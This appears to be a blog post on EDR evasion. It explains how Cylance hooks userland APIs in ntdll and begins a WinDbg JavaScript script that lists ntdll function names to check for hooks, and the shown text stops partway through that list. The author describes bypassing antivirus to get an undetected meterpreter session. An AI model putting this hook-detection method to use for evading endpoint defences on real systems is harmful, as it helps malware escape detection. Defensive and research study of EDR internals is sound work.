Playing with an EDR: Cylance
In the last few months I got really interested in AV evasion. One of the best resources to get introduced into malware development are the following posts from 0xpat blog:
- Malware development part 1 - basics
- Malware development part 2 - anti dynamic analysis & sandboxes
- Malware development part 3 - anti-debugging
- Malware development part 4 - anti static analysis tricks
- Malware development part 5 - tips & tricks
- Malware development part 6 - advanced obfuscation with LLVM and template metaprogramming
- Malware development part 7 - Secure Desktop keylogger
- Malware development part 8 - COFF injection and in-memory execution
- Malware development part 9 - hosting CLR and managed code injection
After learning multiple injection techniques and the mechanisms that AVs use to detect the malware I managed to bypass every of them getting an stable meterpreter session without being detected. That felt really good, until I decided to test my malware against Cylance. For a reason I did not know back them, Cylance was detecting and blocking all my binaries. It seemed that all my work was for nothing as this EDR was just blocking everything flagging everything as suspiccious and I had no idea why, which made me try to understand what was happening there. It turns out that EDRs are quite different detecting malware than the AVs. What are the differences? Why was Cylance detecting my malware?
Userland API hooking
The main difference between an EDR and a normal AV is that EDRs hook the userland APIs. This could be compared to a web proxy - all API calls (including their arguments) that your application makes (say CreateFile, ReadFile, OpenProcess, etc), are intercepted and inspected by EDRs which then decide if the intent of the program is malicious or not.
The way EDR vendors hook userland APIs is by hijacking/modifying function definitions (APIs) found in Windows DLLs such as kernel32/kernelbase and ntdll. Function definitions are modified by inserting a jmp instruction at their very beginning.
Those jmp instructions will change program’s execution flow - the program will get redirected to the EDRs inspection module which will evaluate if the program exhibits any suspicious behaviour and it will do so by analyzing the arguments that were passed to the function that the EDR is hooking/monitoring.
In order to check this, I installed WinDbg in a Virtual Machine with Cylance:
As we can see in the image above, Cylance is hooking NtAllocateVirtualMemory and NtCreateProcess, not NtNotifyChangeSession. This is because the first two are typically used by malware and NtNotifyChangeSession can cause no harm. Basically Cylance will only hook all the ntdll.dll functions that consider dangerous and that could be abused by malware.
At this point, I wanted to automate this and extract all the hooked functions so I wrote the following script that would run later on WinDbg:
"use strict";
function RunCheckHooks()
{
var functions = ["AitFireParentUsageEvent", "AitLogFeatureUsageByApp", "?Allocate@CBufferAllocator@@UAEPAXK@Z", "AlpcAdjustCompletionListConcurrencyCount", "AlpcFreeCompletionListMessage", "AlpcGetCompletionListLastMessageInformation", "AlpcGetCompletionListMessageAttributes", "AlpcGetHeaderSize", "AlpcGetMessageAttribute", "AlpcGetMessageFromCompletionList", "AlpcGetOutstandingCompletionListMessageCount", "AlpcInitializeMessageAttribute", "AlpcMaxAllowedMessageLength", "AlpcRegisterCompletionList", "AlpcRegisterCompletionListWorkerThread", "AlpcRundownCompletionList", "AlpcUnregisterCompletionList", "AlpcUnregisterCompletionListWorkerThread", "ApiSetQueryApiSetPresence", "CsrAllocateCaptureBuffer", "CsrAllocateCapturePointer", "CsrAllocateMessagePointer", "CsrCaptureMessageBuffer", "CsrCaptureMessageMultiUnicodeStringsInPlace", "CsrCaptureMessageString", "CsrCaptureTimeout", "CsrClientCallServer", "CsrClientConnectToServer", "CsrClientMaxMessage", "CsrClientSendMessage", "CsrClientThreadConnect", "CsrDumpProfile", "CsrFreeCaptureBuffer", "CsrGetProcessId", "CsrIdentifyAlertableThread", "CsrNewThread", "CsrpProcessCallbackRequest", "CsrProbeForRead", "CsrProbeForWrite", "CsrSetPriorityClass", "CsrStartProfile", "CsrStopDumpProfile", "CsrStopProfile", "CsrVerifyRegion", "DbgBreakPoint", "DbgPrint", "DbgPrintEx", "DbgPrintReturnControlC", "DbgPrompt", "DbgQueryDebugFilterState", "DbgSetDebugFilterState", "DbgSsHandleKmApiMsg", "DbgSsInitialize", "DbgUiConnectToDbg", "DbgUiContinue", "DbgUiConvertStateChangeStructure", "DbgUiConvertStateChangeStructureEx", "DbgUiDebugActiveProcess", "DbgUiGetThreadDebugObject", "DbgUiIssueRemoteBreakin", "DbgUiRemoteBreakin", "DbgUiSetThreadDebugObject", "DbgUiStopDebugging", "DbgUiWaitStateChange", "DbgUserBreakPoint", "EtwControlTraceA", "EtwControlTraceW", "EtwCreateTraceInstanceId", "EtwDeliverDataBlock", "EtwEnableTrace", "EtwEnumerateProcessRegGuids", "EtwEnumerateTraceGuids", "EtwEventActivityIdControl", "EtwEventEnabled", "EtwEventProviderEnabled", "EtwEventRegister", "EtwEventSetInformation", "EtwEventUnregister", "EtwEventWrite", "EtwEventWriteEndScenario", "EtwEventWriteEx", "EtwEventWriteFull", "EtwEventWriteNoRegistration", "EtwEventWriteStartScenario", "EtwEventWriteString", "EtwEventWriteTransfer", "EtwFlushTraceA", "EtwFlushTraceW", "EtwGetTraceEnableFlags", "EtwGetTraceEnableLevel", "EtwGetTraceLoggerHandle", "EtwLogTraceEvent", "EtwNotificationRegister", "EtwNotificationRegistrationA", "EtwNotificationRegistrationW", "EtwNotificationUnregister", "EtwpCreateEtwThread", "EtwpGetCpuSpeed", "EtwpGetTraceBuffer", "EtwpNotificationThread", "EtwProcessPrivateLoggerRequest", "EtwpSetHWConfigFunction", "EtwQueryAllTracesA", "EtwQueryAllTracesW", "EtwQueryTraceA", "EtwQueryTraceW", "EtwReceiveNotificationsA", "EtwReceiveNotificationsW", "EtwRegisterSecurityProvider", "EtwRegisterTraceGuidsA", "EtwRegisterTraceGuidsW", "EtwReplyNotification", "EtwSendNotification", "EtwSetMark", "EtwStartTraceA", "EtwStartTraceW", "EtwStopTraceA", "EtwStopTraceW", "EtwTraceEvent", "EtwTraceEventInstance", "EtwTraceMessage", "EtwTraceMessageVa", "EtwUnregisterTraceGuids", "EtwUpdateTraceA", "EtwUpdateTraceW", "EtwWriteUMSecurityEvent", "EvtIntReportAuthzEventAndSourceAsync", "EvtIntReportEventAndSourceAsync", "ExpInterlockedPopEntrySListEnd", "ExpInterlockedPopEntrySListEnd16", "ExpInterlockedPopEntrySListEnd8", "ExpInterlockedPopEntrySListFault", "ExpInterlockedPopEntrySListFault16", "ExpInterlockedPopEntrySListFault8", "ExpInterlockedPopEntrySListResume", "ExpInterlockedPopEntrySListResume16", "ExpInterlockedPopEntrySListResume8", "KiFastSystemCall", "KiFastSystemCallRet", "KiIntSystemCall", "KiRaiseUserExceptionDispatcher", "KiUserApcDispatcher", "KiUserCallbackDispatcher", "KiUserExceptionDispatcher", "KiUserInvertedFunctionTable", "LdrAccessOutOfProcessResource", "LdrAccessResource", "LdrAddDllDirectory", "LdrAddLoadAsDataTable", "LdrAddRefDll", "LdrAlternateResourcesEnabled", "LdrAppxHandleIntegrityFailure", "LdrCreateOutOfProcessImage", "LdrDestroyOutOfProcessImage", "LdrDisableThreadCalloutsForDll", "LdrEnumerateLoadedModules", "LdrEnumResources", "LdrFastFailInLoaderCallout", "LdrFindCreateProcessManifest", "LdrFindEntryForAddress", "LdrFlushAlternateResourceModules", "LdrGetDllDirectory", "LdrGetDllFullName", "LdrGetDllHandle", "LdrGetDllHandleByMapping", "LdrGetDllHandleByName", "LdrGetDllHandleEx", "LdrGetDllPath", "LdrGetFailureData", "LdrGetFileNameFromLoadAsDataTable", "LdrGetKnownDllSectionHandle", "LdrGetProcedureAddress", "LdrGetProcedureAddressEx", "LdrGetProcedureAddressForCaller", "LdrHotPatchRoutine", "LdrInitializeThunk", "LdrInitShimEngineDynamic", "LdrLoadAlternateResourceModule", "LdrLoadAlternateResourceModuleEx", "LdrLoadDll", "LdrLockLoaderLock", "LdrOpenImageFileOptionsKey", "LdrpResGetMappingSize", "LdrpResGetRCConfig", "LdrpResGetResourceDirectory", "LdrProcessInitializationComplete", "LdrProcessRelocationBlock", "LdrProcessRelocationBlockEx", "LdrQueryImageFileExecutionOptions", "LdrQueryImageFileExecutionOptionsEx", "LdrQueryImageFileKeyOption", "LdrQueryModuleServiceTags", "LdrQueryOptionalDelayLoadedAPI", "LdrQueryProcessModuleInformation", "LdrRegisterDllNotification", "LdrRemoveDllDirectory", "LdrRemoveLoadAsDataTable", "LdrResFindResource", "LdrResFindResourceDirectory", "LdrResGetRCConfig", "LdrResolveDelayLoadedAPI", "LdrResolveDelayLoadsFromDll", "LdrResRelease", "LdrResSearchResource", "LdrRscIsTypeExist", "LdrSetAppCompatDllRedirectionCallback", "LdrSetDefaultDllDirectories", "LdrSetDllDirectory", "LdrSetDllManifestProber", "LdrSetImplicitPathOptions", "LdrSetMUICacheType", "LdrShutdownProcess", "LdrShutdownThread", "LdrStandardizeSystemPath", "LdrSystemDllInitBlock", "LdrUnloadAlternateResourceModule", "LdrUnloadAlternateResourceModuleEx", "LdrUnloadDll", "LdrUnlockLoaderLock", "LdrUnregisterDllNotification", "LdrVerifyImageMatchesChecksum", "LdrVerifyImageMatchesChecksumEx", "LdrWx86FormatVirtualImage", "MD4Update", "MD5Final", "MD5Init", "MD5Update", "memchr", "memcmp", "memcpy", "memmove", "memset", "NlsAnsiCodePage", "NlsMbCodePageTag", "NlsMbOemCodePageTag", "NPXEMULATORTABLE", "NtAcceptConnectPort", "NtAccessCheck", "NtAccessCheckAndAuditAlarm", "NtAccessCheckByType", "NtAccessCheckByTypeAndAuditAlarm", "NtAccessCheckByTypeResultList", "NtAccessCheckByTypeResultListAndAuditAlarm", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "NtAcquireCMFViewOwnership", "NtAddAtom", "NtAddAtomEx", "NtAddBootEntry", "NtAddDriverEntry", "NtAdjustGroupsToken", "NtAdjustPrivilegesToken", "NtAdjustTokenClaimsAndDeviceGroups", "NtAlertResumeThread", "NtAlertThread", "NtAlertThreadByThreadId", "NtAllocateLocallyUniqueId", "NtAllocateReserveObject", "NtAllocateUserPhysicalPages", "NtAllocateUuids", "NtAllocateVirtualMemory", "NtAlpcAcceptConnectPort", "NtAlpcCancelMessage", "NtAlpcConnectPort", "NtAlpcConnectPortEx", "NtAlpcCreatePort", "NtAlpcCreatePortSection", "NtAlpcCreateResourceReserve", "NtAlpcCreateSectionView", "NtAlpcCreateSecurityContext", "NtAlpcDeletePortSection", "NtAlpcDeleteResourceReserve", "NtAlpcDeleteSectionView", "NtAlpcDeleteSecurityContext", "NtAlpcDisconnectPort", "NtAlpcImpersonateClientContainerOfPort", "NtAlpcImpersonateClientOfPort", "NtAlpcOpenSenderProcess", "NtAlpcOpenSenderThread", "NtAlpcQueryInformation", "NtAlpcQueryInformationMessage", "NtAlpcRevokeSecurityContext", "NtAlpcSendWaitReceivePort", "NtAlpcSetInformation", "NtApphelpCacheControl", "NtAreMappedFilesTheSame", "NtAssignProcessToJobObject", "NtAssociateWaitCompletionPacket", "NtCallbackReturn", "NtCancelDeviceWakeupRequest", "NtCancelIoFile", "NtCancelIoFileEx", "NtCancelSynchronousIoFile", "NtCancelTimer", "NtCancelTimer2", "NtCancelWaitCompletionPacket", "NtClearAllSavepointsTransaction", "NtClearEvent", "NtClearSavepointTransaction", "NtClose", "NtCloseObjectAuditAlarm", "NtCommitComplete", "NtCommitEnlistment", "NtCommitTransaction", "NtCompactKeys", "NtCompareObjects", "NtCompareTokens", "NtCompleteConnectPort", "NtCompressKey", "NtConnectPort", "NtContinue", "NtCreateChannel", "NtCreateDebugObject", "NtCreateDirectoryObject", "NtCreateDirectoryObjectEx", "NtCreateEnlistment", "NtCreateEvent", "NtCreateEventPair", "NtCreateFile", "NtCreateIoCompletion", "NtCreateIRTimer", "NtCreateJobObject", "NtCreateJobSet", "NtCreateKey", "NtCreateKeyedEvent", "NtCreateKeyTransacted", "NtCreateLowBoxToken", "NtCreateMailslotFile", "NtCreateMutant", "NtCreateNamedPipeFile", "NtCreatePagingFile", "NtCreatePartition", "NtCreatePort", "NtCreatePrivateNamespace", "NtCreateProcess", "NtCreateProcessEx", "NtCreateProfile", "NtCreateProfileEx", "NtCreateResourceManager", "NtCreateSection", "NtCreateSemaphore", "NtCreateSymbolicLinkObject", "NtCreateThread", "NtCreateThreadEx", "NtCreateTimer", "NtCreateTimer2", "NtCreateToken", "NtCreateTokenEx", "NtCreateTransaction", "NtCreateTransactionManager", "NtCreateUserProcess", "NtCreateWaitablePort", "NtCreateWaitCompletionPacket", "NtCreateWnfStateName", "NtCreateWorkerFactory", "NtCurrentTeb", "NtDebugActiveProcess", "NtDebugContinue", "NtDelayExecution", "NtDeleteAtom", "NtDeleteBootEntry", "NtDeleteDriverEntry", "NtDeleteFile", "NtDeleteKey", "NtDeleteObjectAuditAlarm", "NtDeletePrivateNamespace", "NtDeleteValueKey", "NtDeleteWnfStateData", "NtDeleteWnfStateName", "NtDeviceIoControlFile", "NtDisableLastKnownGood", "NtDisplayString", "NtDrawText", "NtDuplicateObject", "NtDuplicateToken", "NtEnableLastKnownGood", "NtEnumerateBootEntries", "NtEnumerateBus", "NtEnumerateDriverEntries", "NtEnumerateKey", "NtEnumerateSystemEnvironmentValuesEx", "NtEnumerateTransactionObject", "NtEnumerateValueKey", "NtExtendSection", "NtFilterBootOption", "NtFilterToken", "NtFilterTokenEx", "NtFindAtom", "NtFlushBuffersFile", "NtFlushBuffersFileEx", "NtFlushInstallUILanguage", "NtFlushInstructionCache", "NtFlushKey", "NtFlushProcessWriteBuffers", "NtFlushVirtualMemory", "NtFlushWriteBuffer", "NtFreeUserPhysicalPages", "NtFreeVirtualMemory", "NtFreezeRegistry", "NtFreezeTransactions", "NtFsControlFile", "NtGetCachedSigningLevel", "NtGetCompleteWnfStateSubscription", "NtGetContextThread", "NtGetCurrentProcessorNumber", "NtGetCurrentProcessorNumberEx", "NtGetDevicePowerState", "NtGetMUIRegistryInfo", "NtGetNextProcess", "NtGetNextThread", "NtGetNlsSectionPtr", "NtGetNotificationResourceManager", "NtGetPlugPlayEvent", "NtGetTickCount", "NtGetWriteWatch", "NtImpersonateAnonymousToken", "NtImpersonateClientOfPort", "NtImpersonateThread", "NtInitializeNlsFiles", "NtInitializeRegistry", "NtInitializeVDM", "NtInitiatePowerAction", "NtIsProcessInJob", "NtIsSystemResumeAutomatic", "NtIsUILanguageComitted", "NtListenChannel", "NtListenPort", "NtListTransactions", "NtLoadDriver", "NtLoadKey", "NtLoadKey2", "NtLoadKeyEx", "NtLockFile", "NtLockProductActivationKeys", "NtLockRegistryKey", "NtLockVirtualMemory", "NtMakePermanentObject", "NtMakeTemporaryObject", "NtManagePartition", "NtMapCMFModule", "NtMapUserPhysicalPages", "NtMapUserPhysicalPagesScatter", "NtMapViewOfSection", "NtMarshallTransaction", "NtModifyBootEntry", "NtModifyDriverEntry", "NtNotifyChangeDirectoryFile", "NtNotifyChangeKey", "NtNotifyChangeMultipleKeys", "NtNotifyChangeSession", "NtOpenChannel", "NtOpenDirectoryObject", "NtOpenEnlistment", "NtOpenEvent", "NtOpenEventPair", "NtOpenFile", "NtOpenIoCompletion", "NtOpenJobObject", "NtOpenKey", "NtOpenKeyedEvent", "NtOpenKeyEx", "NtOpenKeyTransacted", "NtOpenKeyTransactedEx", "NtOpenMutant", "NtOpenObjectAuditAlarm", "NtOpenPartition", "NtOpenPrivateNamespace", "NtOpenProcess", "NtOpenProcessToken", "NtOpenProcessTokenEx", "NtOpenResourceManager", "NtOpenSection", "NtOpenSemaphore", "NtOpenSession", "NtOpenSymbolicLinkObject", "NtOpenThread", "NtOpenThreadToken", "NtOpenThreadTokenEx", "NtOpenTimer", "NtOpenTransaction", "NtOpenTransactionManager", "NtPlugPlayControl", "NtPowerInformation", "NtPrepareComplete", "NtPrepareEnlistment", "NtPrePrepareComplete", "NtPrePrepareEnlistment", "NtPrivilegeCheck", "NtPrivilegedServiceAuditAlarm", "NtPrivilegeObjectAuditAlarm", "NtPropagationComplete", "NtPropagationFailed", "NtProtectVirtualMemory", "NtPullTransaction", "NtPulseEvent", "NtQueryAttributesFile", "NtQueryBootEntryOrder", "NtQueryBootOptions", "NtQueryDebugFilterState", "NtQueryDefaultLocale", "NtQueryDefaultUILanguage", "NtQueryDirectoryFile", "NtQueryDirectoryObject", "NtQueryDriverEntryOrder", "NtQueryEaFile", "NtQueryEvent", "NtQueryFullAttributesFile", "NtQueryInformationAtom", "NtQueryInformationEnlistment", "NtQueryInformationFile", "NtQueryInformationJobObject", "NtQueryInformationPort", "NtQueryInformationProcess", "NtQueryInformationResourceManager", "NtQueryInformationThread", "NtQueryInformationToken", "NtQueryInformationTransaction", "NtQueryInformationTransactionManager", "NtQueryInformationWorkerFactory", "NtQueryInstallUILanguage", "NtQueryIntervalProfile", "NtQueryIoCompletion", "NtQueryKey", "NtQueryLicenseValue", "NtQueryMultipleValueKey", "NtQueryMutant", "NtQueryObject", "NtQueryOleDirectoryFile", "NtQueryOpenSubKeys", "NtQueryOpenSubKeysEx", "NtQueryPerformanceCounter", "NtQueryPortInformationProcess", "NtQueryQuotaInformationFile", "NtQuerySection", "NtQuerySecurityAttributesToken", "NtQuerySecurityObject", "NtQuerySemaphore", "NtQuerySymbolicLinkObject", "NtQuerySystemEnvironmentValue", "NtQuerySystemEnvironmentValueEx", "NtQuerySystemInformation", "NtQuerySystemInformationEx", "NtQuerySystemTime", "NtQueryTimer", "NtQueryTimerResolution", "NtQueryValueKey", "NtQueryVirtualMemory", "NtQueryVolumeInformationFile", "NtQueryWnfStateData", "NtQueryWnfStateNameInformation", "NtQueueApcThread", "NtQueueApcThreadEx", "NtRaiseException", "NtRaiseHardError", "NtReadFile", "NtReadFileScatter", "NtReadOnlyEnlistment", "NtReadRequestData", "NtReadVirtualMemory", "NtRecoverEnlistment", "NtRecoverResourceManager", "NtRecoverTransactionManager", "NtRegisterNewDevice", "NtRegisterProtocolAddressInformation", "NtRegisterThreadTerminatePort", "NtReleaseCMFViewOwnership", "NtReleaseKeyedEvent", "NtReleaseMutant", "NtReleaseProcessMutant", "NtReleaseSemaphore", "NtReleaseWorkerFactoryWorker", "NtRemoveIoCompletion", "NtRemoveIoCompletionEx", "NtRemoveProcessDebug", "NtRenameKey", "NtRenameTransactionManager", "NtRenameValueKey", "NtReplaceKey", "NtReplacePartitionUnit", "NtReplyPort", "NtReplyWaitReceivePort", "NtReplyWaitReceivePortEx", "NtReplyWaitReplyPort", "NtReplyWaitSendChannel", "NtRequestDeviceWakeup", "NtRequestPort", "NtRequestWaitReplyPort", "NtRequestWakeupLatency", "NtResetEvent", "NtResetWriteWatch", "NtRestoreKey", "NtResumeProcess", "NtResumeThread", "NtRevertContainerImpersonation", "NtRollbackComplete", "NtRollbackEnlistment", "NtRollbackSavepointTransaction", "NtRollbackTransaction", "NtRollforwardTransactionManager", "NtSaveKey", "NtSaveKeyEx", "NtSaveMergedKeys", "NtSavepointComplete", "NtSavepointTransaction", "NtSecureConnectPort", "NtSendWaitReplyChannel", "NtSerializeBoot", "NtSetBootEntryOrder", "NtSetBootOptions", "NtSetCachedSigningLevel", "NtSetContextChannel", "NtSetContextThread", "NtSetDebugFilterState", "NtSetDefaultHardErrorPort", "NtSetDefaultLocale", "NtSetDefaultUILanguage", "NtSetDriverEntryOrder", "NtSetEaFile", "NtSetEvent", "NtSetEventBoostPriority", "NtSetHighEventPair", "NtSetHighWaitLowEventPair", "NtSetHighWaitLowThread", "NtSetInformationDebugObject", "NtSetInformationEnlistment", "NtSetInformationFile", "NtSetInformationJobObject", "NtSetInformationKey", "NtSetInformationObject", "NtSetInformationProcess", "NtSetInformationResourceManager", "NtSetInformationSymbolicLink", "NtSetInformationThread", "NtSetInformationToken", "NtSetInformationTransaction", "NtSetInformationTransactionManager", "NtSetInformationVirtualMemory", "NtSetInformationWorkerFactory", "NtSetIntervalProfile", "NtSetIoCompletion", "NtSetIoCompletionEx", "NtSetIRTimer", "NtSetLdtEntries", "NtSetLowEventPair", "NtSetLowWaitHighEventPair", "NtSetLowWaitHighThread", "NtSetQuotaInformationFile", "NtSetSecurityObject", "NtSetSystemEnvironmentValue", "NtSetSystemEnvironmentValueEx", "NtSetSystemInformation", "NtSetSystemPowerState", "NtSetSystemTime", "NtSetThreadExecutionState", "NtSetTimer", "NtSetTimer2", "NtSetTimerEx", "NtSetTimerResolution", "NtSetUuidSeed", "NtSetValueKey", "NtSetVolumeInformationFile", "NtSetWnfProcessNotificationEvent", "NtShutdownSystem", "NtShutdownWorkerFactory", "NtSignalAndWaitForSingleObject", "NtSinglePhaseReject", "NtStartProfile", "NtStartTm", "NtStopProfile", "NtSubscribeWnfStateChange", "NtSuspendProcess", "NtSuspendThread", "NtSystemDebugControl", "NtTerminateJobObject", "NtTerminateProcess", "NtTerminateThread", "NtTestAlert", "NtThawRegistry", "NtThawTransactions", "NtTraceControl", "NtTraceEvent", "NtTranslateFilePath", "NtUmsThreadYield", "NtUnloadDriver", "NtUnloadKey", "NtUnloadKey2", "NtUnloadKeyEx", "NtUnlockFile", "NtUnlockVirtualMemory", "NtUnmapViewOfSection", "NtUnmapViewOfSectionEx", "NtUnsubscribeWnfStateChange", "NtUpdateWnfStateData", "NtVdmControl", "NtVdmStartExecution", "NtW32Call", "NtWaitForAlertByThreadId", "NtWaitForDebugEvent", "NtWaitForKeyedEvent", "NtWaitForMultipleObjects", "NtWaitForMultipleObjects32", "NtWaitForProcessMutant", "NtWaitForSingleObject", "NtWaitForWnfNotifications", "NtWaitForWorkViaWorkerFactory", "NtWaitHighEventPair", "NtWaitLowEventPair", "NtWorkerFactoryWorkerReady", "NtWow64AllocateVirtualMemory64", "NtWow64CallFunction64", "NtWow64CsrAllocateCaptureBuffer", "NtWow64CsrAllocateMessagePointer", "NtWow64CsrCaptureMessageBuffer", "NtWow64CsrCaptureMessageString", "NtWow64CsrClientCallServer", "NtWow64CsrClientConnectToServer", "NtWow64CsrFreeCaptureBuffer", "NtWow64CsrGetProcessId", "NtWow64CsrIdentifyAlertableThread", "NtWow64CsrNewThread", "NtWow64CsrSetPriorityClass", "NtWow64CsrVerifyRegion", "NtWow64DebuggerCall", "NtWow64GetCurrentProcessorNumberEx", "NtWow64GetNativeSystemInformation", "NtWow64InterlockedPopEntrySList", "NtWow64IsProcessorFeaturePresent", "NtWow64QueryInformationProcess64", "NtWow64QueryVirtualMemory64", "NtWow64ReadVirtualMemory64", "NtWow64WriteVirtualMemory64", "NtWriteFile", "NtWriteFileGather", "NtWriteRequestData", "NtWriteVirtualMemory", "NtYieldExecution", "PfxFindPrefix", "PfxInitialize", "PfxInsertPrefix", "PfxRemovePrefix", "pow", "PropertyLengthAsVariant", "PssNtCaptureSnapshot", "PssNtDuplicateSnapshot", "PssNtFreeRemoteSnapshot", "PssNtFreeSnapshot", "PssNtFreeWalkMarker", "PssNtQuerySnapshot", "PssNtValidateDescriptor", "PssNtWalkSnapshot", "qsort", "ResCCloseRuntimeView", "ResCCompareCacheIDs", "ResCCreateCultureMap", "ResCCreateDefaultCultureMap", "ResCCreateRuntimeView", "ResCDirectoryCreateAndPopulate", "ResCDirectoryCreateMapping", "ResCDirectoryFree", "ResCDirectoryGetBaseFolder", "ResCDirectoryGetEntry", "ResCDirectoryGetEntryCopy", "ResCDirectoryGetEntryEx", "ResCDirectoryGetEntryExCopy", "ResCDirectoryGetEntryIndex", "ResCDirectoryGetEntryIndexEx", "ResCDirectoryGetFirstEntry", "ResCDirectoryGetFirstEntryIndex", "ResCDirectoryGetSegmentIndex", "ResCDirectoryGetSegmentName", "ResCDirectoryLoadFixedSize", "ResCDirectoryOpenMapping", "ResCFreeCultureMap", "ResCGetCacheIndices", "ResCGetCultureID", "ResCGetCultureIndex", "ResCGetCultureName", "ResCGetHighestCacheIndex", "ResCGetHighestConsecutiveCacheIndex", "ResCGetIndexedName", "ResCGetName", "ResCGetRegistryBaseFolder", "ResCGetRegistryConfig", "ResCGetRegistryLatestIndex", "ResCGetRegistryMappingPrefix", "ResCGetRegistryStatus", "ResCGetSubIndexedName", "ResCInitRuntimeView", "ResCInitRuntimeViewEx", "ResCKeDirectoryOpenMapping", "ResCKeGetBaseFolder", "ResCKeGetCacheIndices", "ResCKeInitRuntimeViewEx", "ResCKeSegmentOpenMapping", "ResCLoadCultureMap", "ResCOpenRegistryKey", "ResCOpenRuntimeView", "ResCReleaseInitMutex", "ResCReloadCultureMap", "ResCRequestInitMutex", "ResCRuntimeGetAnySegmentData", "ResCRuntimeGetCultureID", "ResCRuntimeGetEntryData", "ResCRuntimeGetEntryDataEx", "ResCRuntimeGetResourceData", "ResCRuntimeGetResourceDataEx", "ResCRuntimeGetResourceDataForCulture", "ResCRuntimeGetSegmentData", "ResCRuntimeGetSegmentDataEx", "ResCRuntimeViewLoadCultureMap", "ResCSaveRegistryBaseFolder", "ResCSaveRegistryConfig", "ResCSaveRegistryLatestIndex", "ResCSaveRegistryStatus", "ResCSegmentCreateAndPopulate", "ResCSegmentCreateMapping", "ResCSegmentFree", "ResCSegmentGetData", "ResCSegmentLoadFixedSize", "ResCSegmentOpenMapping", "ResCSegmentReserveMapping", "ResCSetCacheSecurityType", "RestoreEm87Context", "RtlAbortRXact", "RtlAbsoluteToSelfRelativeSD", "RtlAcquirePebLock", "RtlAcquirePrivilege", "RtlAcquireReleaseSRWLockExclusive", "RtlAcquireResourceExclusive", "RtlAcquireResourceShared", "RtlAcquireSRWLockExclusive", "RtlAcquireSRWLockShared", "RtlActivateActivationContext", "RtlActivateActivationContextEx", "RtlActivateActivationContextUnsafeFast", "RtlAddAccessAllowedAce", "RtlAddAccessAllowedAceEx", "RtlAddAccessAllowedObjectAce", "RtlAddAccessDeniedAce", "RtlAddAccessDeniedAceEx", "RtlAddAccessDeniedObjectAce", "RtlAddAce", "RtlAddActionToRXact", "RtlAddAtomToAtomTable", "RtlAddAttributeActionToRXact", "RtlAddAuditAccessAce", "RtlAddAuditAccessAceEx", "RtlAddAuditAccessObjectAce", "RtlAddCompoundAce", "RtlAddFunctionTable", "RtlAddGrowableFunctionTable", "RtlAddIntegrityLabelToBoundaryDescriptor", "RtlAddMandatoryAce", "RtlAddProcessTrustLabelAce", "RtlAddRange", "RtlAddRefActivationContext", "RtlAddRefMemoryStream", "RtlAddResourceAttributeAce", "RtlAddressInSectionTable", "RtlAddScopedPolicyIDAce", "RtlAddSIDToBoundaryDescriptor", "RtlAddVectoredContinueHandler", "RtlAddVectoredExceptionHandler", "RtlAdjustPrivilege", "RtlAllocateActivationContextStack", "RtlAllocateAndInitializeSid", "RtlAllocateAndInitializeSidEx", "RtlAllocateHandle", "RtlAllocateHeap", "RtlAllocateMemoryBlockLookaside", "RtlAllocateMemoryZone", "RtlAllocateWnfSerializationGroup", "RtlAnalyzeProfile", "RtlAnsiCharToUnicodeChar", "RtlAnsiStringToUnicodeSize", "RtlAnsiStringToUnicodeString", "RtlAppendAsciizToString", "RtlAppendPathElement", "RtlAppendStringToString", "RtlAppendUnicodeStringToString", "RtlAppendUnicodeToString", "RtlApplicationVerifierStop", "RtlApplyRXact", "RtlApplyRXactNoFlush", "RtlAppxIsFileOwnedByTrustedInstaller", "RtlAreAllAccessesGranted", "RtlAreAnyAccessesGranted", "RtlAreBitsClear", "RtlAreBitsSet", "RtlAssert", "RtlAssert2", "RtlAvlInsertNodeEx", "RtlAvlRemoveNode", "RtlBarrier", "RtlBarrierForDelete", "RtlCallbackLpcClient", "RtlCancelTimer", "RtlCanonicalizeDomainName", "RtlCapabilityCheck", "RtlCaptureContext", "RtlCaptureStackBackTrace", "RtlCaptureStackContext", "RtlCharToInteger", "RtlCheckForOrphanedCriticalSections", "RtlCheckPortableOperatingSystem", "RtlCheckProcessParameters", "RtlCheckRegistryKey", "RtlCheckSandboxedToken", "RtlCheckTokenCapability", "RtlCheckTokenMembership", "RtlCheckTokenMembershipEx", "RtlCleanUpTEBLangLists", "RtlClearAllBits", "RtlClearBit", "RtlClearBits", "RtlCloneMemoryStream", "RtlCloneUserProcess", "RtlClosePropertySet", "RtlCmDecodeMemIoResource", "RtlCmEncodeMemIoResource", "RtlCommitDebugInfo", "RtlCommitMemoryStream", "RtlCompactHeap", "RtlCompareAltitudes", "RtlCompareMemory", "RtlCompareMemoryUlong", "RtlCompareString", "RtlCompareUnicodeString", "RtlCompareUnicodeStrings", "RtlCompareVariants", "RtlCompleteProcessCloning", "RtlCompressBuffer", "RtlComputeCrc32", "RtlComputeImportTableHash", "RtlConnectToSm", "RtlConsoleMultiByteToUnicodeN", "RtlContractHashTable", "RtlConvertDeviceFamilyInfoToString", "RtlConvertExclusiveToShared", "RtlConvertLCIDToString", "RtlConvertLongToLargeInteger", "RtlConvertPropertyToVariant", "RtlConvertSharedToExclusive", "RtlConvertSidToUnicodeString", "RtlConvertSRWLockExclusiveToShared", "RtlConvertToAutoInheritSecurityObject", "RtlConvertUiListToApiList", "RtlConvertUlongToLargeInteger", "RtlConvertVariantToProperty", "RtlCopyBitMap", "RtlCopyContext", "RtlCopyExtendedContext", "RtlCopyLuid", "RtlCopyLuidAndAttributesArray", "RtlCopyMappedMemory", "RtlCopyMemory", "RtlCopyMemoryNonTemporal", "RtlCopyMemoryStreamTo", "RtlCopyOutOfProcessMemoryStreamTo", "RtlCopyRangeList", "RtlCopySecurityDescriptor", "RtlCopySid", "RtlCopySidAndAttributesArray", "RtlCopyString", "RtlCopyUnicodeString", "RtlCrc32", "RtlCrc64", "RtlCreateAcl", "RtlCreateActivationContext", "RtlCreateAndSetSD", "RtlCreateAtomTable", "RtlCreateBootStatusDataFile", "RtlCreateBoundaryDescriptor", "RtlCreateEnvironment", "RtlCreateEnvironmentEx", "RtlCreateHashTable", "RtlCreateHashTableEx", "RtlCreateHeap", "RtlCreateLpcServer", "RtlCreateMemoryBlockLookaside", "RtlCreateMemoryZone", "RtlCreateProcessParameters", "RtlCreateProcessParametersEx", "RtlCreateProcessReflection", "RtlCreatePropertySet", "RtlCreateQueryDebugBuffer", "RtlCreateRegistryKey", "RtlCreateSecurityDescriptor", "RtlCreateServiceSid", "RtlCreateSystemVolumeInformationFolder", "RtlCreateTagHeap", "RtlCreateTimer", "RtlCreateTimerQueue", "RtlCreateUmsCompletionList", "RtlCreateUmsThread", "RtlCreateUmsThreadContext", "RtlCreateUnicodeString", 